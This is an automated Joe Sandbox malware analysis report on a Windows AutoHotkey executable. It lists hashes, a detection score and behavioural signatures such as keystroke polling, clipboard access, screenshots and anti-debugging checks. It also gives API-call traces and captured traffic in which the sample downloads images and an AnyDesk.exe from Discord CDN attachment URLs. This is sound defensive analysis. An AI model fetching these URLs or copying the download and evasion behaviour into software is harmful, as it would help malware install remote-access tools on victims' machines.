Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.14270.3068.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.14270.3068.exe
Analysis ID:1417368
MD5:dfbaf344699830430ae052254168d580
SHA1:de616823f575b133c413bd497d30f8b19e71dce6
SHA256:51b0a985ab920e9f898b89bb10d3c5f6382179b046f3882a5697c1e2d8c88ba6
Tags:exe
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Contains functionality to detect sleep reduction / modifications
Sample or dropped binary is a compiled AutoHotkey binary
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeReversingLabs: Detection: 13%
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeVirustotal: Detection: 45%Perma Link
Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400AE260 FindFirstFileW,FindClose,FindFirstFileW,FindClose,0_2_00000001400AE260
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400AE160 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00000001400AE160
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014003C8E0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,0_2_000000014003C8E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140066F50 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_0000000140066F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400672B0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,free,malloc,0_2_00000001400672B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140081660 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,0_2_0000000140081660
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140067900 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,0_2_0000000140067900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140081C50 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0000000140081C50
Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox ViewIP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007E490 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,0_2_000000014007E490
Source: global trafficHTTP traffic detected: GET /attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&is=658476a2&hm=0a3291a0428a9a3a412cccb212e697c45efde312d3ae0a17818b7bba37eb978d& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&is=658476a2&hm=e54785c353dcbe635c35016ed6a0babbb34588ac67d1176df058c308ee2bef44& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&is=658476a2&hm=ceac553c8fa20a5a29d3a30fafcd5022ef44d33396c849d1a84b29a8507c87e5& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edcb&is=658478cb&hm=1ccb90ac0e74e5fc5ff101f4716703308a02fb42540256a74e81a4d808fbe4ef& HTTP/1.1User-Agent: AutoHotkeyHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; path=/; expires=Fri, 29-Mar-24 04:51:01 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V6xnPq1xbTgxH6gOWx21TemBvlKNtiv4oscg8DiiDreyU66khMHs4Y04SDY0%2Fupk7IHVOnOqHwUHTqOrzN45cRFfo3n9JskjwMUGXcz5%2FktyKp%2BKhQlCKtHeTGcuLzsaL3tlQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 86bd12198ddc05ce-IADalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbHSRBjCGkqqNTK04oK6XceWlvmYyEiRupfFt2LLROR3P43X0Ng54r0g2dclIl1HE88oLzk4M0P8t3AwSofZllPcyza%2F6MyRYbVWEh0aP0Vw3%2Bc2LpY2qDoO3F5OHhxDHD7biA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86bd121d38785a40-IADalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjSik6EHcLiOpxxP1xAL6k%2BoMUGw42udkdzosPaF0VZ%2BoORFcx16y%2BGQX1GRx3Mh4cXbZf85fCscxFE4RUVXQs68LbsaTji7m4%2BEp4Nuuiu69k%2F5y4Ozg5cxfzbaFkoIylpYPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86bd12203afa5a45-IADalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 04:21:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjW5pURb%2BDcAIYFDC%2B%2B%2FKrte0TLhDJBEVjIZiQkp1uzrOEETOhAlg2bXCSWmxOxdAJeOABUb7IbycRwGXfD6OsxsjnQSEP4FEpLL0Ss9iQlfC5aJCmTvIGhKHH%2F38PLNLM2bdw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86bd122319af20ba-IADalt-svc: h3=":443"; ma=86400
Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeString found in binary or memory: https://autohotkey.com
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeString found in binary or memory: https://autohotkey.comCould
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000003.2082580723.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeString found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&i
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeString found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&i
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeString found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&i
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exeString found in binary or memory: https://cdn.discordapp.com/attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edc
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400065E0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,0_2_00000001400065E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140006240 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalFree,0_2_0000000140006240
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B12C0 EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,0_2_00000001400B12C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400064C0 GetClipboardFormatNameW,GetClipboardData,0_2_00000001400064C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140054F10 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,free,free,free,free,malloc,0_2_0000000140054F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400167C0 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,0_2_00000001400167C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140001ABC GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,0_2_0000000140001ABC

System Summary

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeWindow found: window name: AutoHotkeyJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005F630: CreateFileW,DeviceIoControl,CloseHandle,0_2_000000014005F630
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140081CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_0000000140081CD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400561300_2_0000000140056130
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007E4900_2_000000014007E490
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B26500_2_00000001400B2650
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014008A6B00_2_000000014008A6B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D2AC40_2_00000001400D2AC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014001EF900_2_000000014001EF90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D70100_2_00000001400D7010
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140001ABC0_2_0000000140001ABC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140041B600_2_0000000140041B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140049FF00_2_0000000140049FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004C0500_2_000000014004C050
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400BE0A00_2_00000001400BE0A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014003A0950_2_000000014003A095
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400620E00_2_00000001400620E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005C0E00_2_000000014005C0E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400BC1900_2_00000001400BC190
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400201B30_2_00000001400201B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014008E1C00_2_000000014008E1C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400501D80_2_00000001400501D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009E2200_2_000000014009E220
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004622B0_2_000000014004622B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400A02D00_2_00000001400A02D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D63B00_2_00000001400D63B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004E3AB0_2_000000014004E3AB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004A3C00_2_000000014004A3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004C3F00_2_000000014004C3F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005A4200_2_000000014005A420
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014000A4200_2_000000014000A420
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400904AD0_2_00000001400904AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400904BC0_2_00000001400904BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400904D80_2_00000001400904D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400904FA0_2_00000001400904FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400DE5000_2_00000001400DE500
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009051B0_2_000000014009051B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400905270_2_0000000140090527
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009054D0_2_000000014009054D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004654B0_2_000000014004654B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009058E0_2_000000014009058E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400885810_2_0000000140088581
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009A5C80_2_000000014009A5C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400926380_2_0000000140092638
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400286B00_2_00000001400286B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014002A7600_2_000000014002A760
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014000278B0_2_000000014000278B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B07C00_2_00000001400B07C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400807F00_2_00000001400807F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005C8400_2_000000014005C840
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014000A8400_2_000000014000A840
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007E8600_2_000000014007E860
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400988800_2_0000000140098880
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004C8900_2_000000014004C890
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400588A00_2_00000001400588A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014009A8A50_2_000000014009A8A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400709000_2_0000000140070900
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400209200_2_0000000140020920
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005092D0_2_000000014005092D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014005E9500_2_000000014005E950
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400869900_2_0000000140086990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400409A00_2_00000001400409A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400AC9B00_2_00000001400AC9B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007A9C00_2_000000014007A9C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140008A600_2_0000000140008A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140072AE00_2_0000000140072AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400B8B100_2_00000001400B8B10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400AEB600_2_00000001400AEB60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140052B900_2_0000000140052B90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140050B920_2_0000000140050B92
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140048BA00_2_0000000140048BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014008CC200_2_000000014008CC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014006EC200_2_000000014006EC20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014007CC1F0_2_000000014007CC1F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400C8C500_2_00000001400C8C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140032C680_2_0000000140032C68
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140046CA00_2_0000000140046CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140060CB90_2_0000000140060CB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140074D000_2_0000000140074D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140094D300_2_0000000140094D30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400D6D3C0_2_00000001400D6D3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140076D400_2_0000000140076D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140058D600_2_0000000140058D60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140006D700_2_0000000140006D70
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001400CEE200_2_00000001400CEE20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140080E200_2_0000000140080E20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140044E600_2_0000000140044E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_000000014004AE700_2_000000014004AE70
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140012EF00_2_0000000140012EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140054F100_2_0000000140054F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140018F600_2_0000000140018F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_0000000140050FB00_2_0000000140050FB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exeCode function: 0_2_00000001401270000_2_0000000140127000
